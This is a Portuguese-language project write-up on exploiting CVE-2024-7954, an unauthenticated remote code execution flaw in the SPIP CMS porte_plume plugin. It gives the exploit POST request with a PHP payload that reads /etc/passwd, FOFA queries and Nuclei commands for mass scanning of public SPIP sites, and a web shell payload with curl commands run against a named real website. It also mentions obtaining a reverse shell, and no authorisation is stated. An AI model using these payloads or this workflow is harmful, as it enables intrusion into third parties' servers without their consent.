
Exploitation of a Remote Code Execution vulnerability- (CVE-2024-7954)
Projeto de Teste de Vulnerabilidade de Software Enviado por: Shivansh Kuntal
Este projeto demonstra a exploração da CVE-2024-7954, uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta o SPIP CMS através do seu plugin porte_plume.
A vulnerabilidade permite que atacantes não autenticados executem código PHP arbitrário no servidor alvo por meio de requisições HTTP POST manipuladas.
Os testes foram realizados em um ambiente local controlado e posteriormente estendidos para reconhecimento em cenário real usando FOFA e Nuclei.
Uma versão vulnerável do SPIP CMS, confirmada como afetada pela CVE-2024-7954, foi implantada localmente em um servidor Apache usando um repositório GitHub que hospeda versões conhecidamente vulneráveis.
Ferramentas Utilizadas
A página inicial do SPIP rodando em localhost validou a instalação bem-sucedida e serviu como alvo para exploração.
O plugin porte_plume (antes das versões 4.30-alpha2, 4.2.13, 4.1.16) é vulnerável devido à sanitização insuficiente da entrada fornecida pelo usuário. Atacantes podem injetar código PHP em campos de formulário específicos que posteriormente é renderizado e executado pelo servidor.
Impacto: Execução Remota de Código Não Autenticada Severidade: Crítica Vetor de Ataque: Rede / HTTP POST
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Uma consulta FOFA foi usada para enumerar instalações públicas de SPIP:
app="SPIP"
O FOFA retornou vários pontos de metadados:
targets.txt para varredura em lote.Um host real adequado identificado:
http://www.comite-tricolore.org/
Como a exploração manual é lenta, o Nuclei foi usado para automatizar a detecção da CVE-2024-7954 em um grande conjunto de alvos.
nuclei -l targets.txt -t CVE-2024-7954.yaml
-l targets.txt carrega os resultados FOFA-t carrega o template PoC personalizadoNota: O template inicial retornou nenhuma correspondência.
nuclei -l targets.txt -t cves/
Esta varredura identificou um alvo responsivo:
http://www.comite-tricolore.org/
Acessar:
http://www.comite-tricolore.org/spip.php?page=contact
Confirmado:
Usando Burp Suite ou curl, modificar o parâmetro message:
Payload
<?php system($_GET['cmd']); ?>
Acessar:
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id
Ou usando curl:
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"
Saída confirmou execução remota de comandos.
Um payload elaborado possibilita um callback de reverse shell, permitindo:
whoamilsEste projeto demonstra a cadeia completa de exploração para a CVE-2024-7954, desde o reconhecimento até a obtenção de um shell interativo.
Esta vulnerabilidade destaca como um plugin de formatação de texto aparentemente inofensivo pode criar um comprometimento completo do sistema quando não está devidamente protegido.